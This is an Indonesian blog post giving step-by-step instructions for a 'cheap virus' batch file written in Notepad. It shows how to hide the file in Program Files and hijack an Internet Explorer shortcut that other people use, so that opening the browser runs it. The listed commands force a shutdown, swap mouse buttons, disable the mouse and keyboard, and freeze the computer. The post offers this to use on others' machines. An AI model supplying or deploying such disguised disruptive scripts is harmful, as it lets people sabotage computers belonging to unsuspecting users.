join saya di sini

blog-indonesia.com

09/05/12

membuat sript virus ecek-ecek di notepad


Syallom semua teman-teman pembaca.. hehe (baru bangun tidur langsung  dapat ide pencerahan)
Kemarin teman saya (si Polikarpus Wiwid) minta tolong kepada saya, dan sekarang saya mencoba membuat virus ecek-ecekan..

Ok ini berdasarkan percobaan di leptop saya sendiri, dan hasilnya terbukti . Langsung saja ikuti langkah2 berikut :


1. Buka Notepad di pc/leptop anda Start-all programs-accessories-Notepad (terus banting pc anda..kwkw)
2. Setelah Notepad terbuka, ketik di notepad anda seperti gambar berikut


3. Setelah itu pilih menu File-save as File name nya dig anti jadi name.bat
4. Saya sarankan file tersebut anda letakkan di Local C: pada Program Files
5. Lalu pilih sasaran/target yang sering di gunakan orang (saya contohkan di Internet Exploler)
6. Pilih sasaran anda (Internet Exploler tadi) lalu klik kanan-properties- isi target nya seperti gambar berikut
7. Pilih Apply lalu Ok. Setelah itu.. silahkan tes efeknya dengan membuka Internet Exploler nya..
8. “Good Luck Man”

*pada pengetikan scrip di no. 2 anda juga bisa mengganti dengan scrip berikut :
invisible command

@echo off
Swap mouse

rundll32 user,swapmousebutton
buka URL yg diinginkan

start http://www.google.com
Shutdown kmptr & beri pesan

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart

rundll32 mouse,disable
Disable keyboard stlh Restart

rundll32 keyboard,disable
Freezes kmptr stlh Restart

rundll32 user,disableoemlayer



dan jangan lupa di save dengan format *.bat


0 komentar:

Posting Komentar